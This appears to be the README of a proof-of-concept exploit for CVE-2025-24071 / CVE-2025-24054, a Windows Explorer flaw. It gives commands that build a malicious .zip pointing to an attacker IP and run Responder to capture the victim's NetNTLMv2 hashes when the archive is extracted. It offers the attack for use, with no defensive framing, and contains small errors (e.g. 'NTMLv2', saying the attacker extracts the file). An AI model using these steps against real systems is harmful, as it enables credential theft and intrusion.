
A PoC of CVE-2025-24071 / CVE-2025-24054, A windows vulnerability that allow get NTMLv2 hashes
This Windows vulnerability, specifically in 'explorer.exe', allows us to receive a NetNTLMv2 hash from a victim simply by having the attacker extract a .zip file.
python PoC.py test 192.168.1.45

sudo python3 responder.py -I ens33

.zip, Boom! we get the NTLM hashes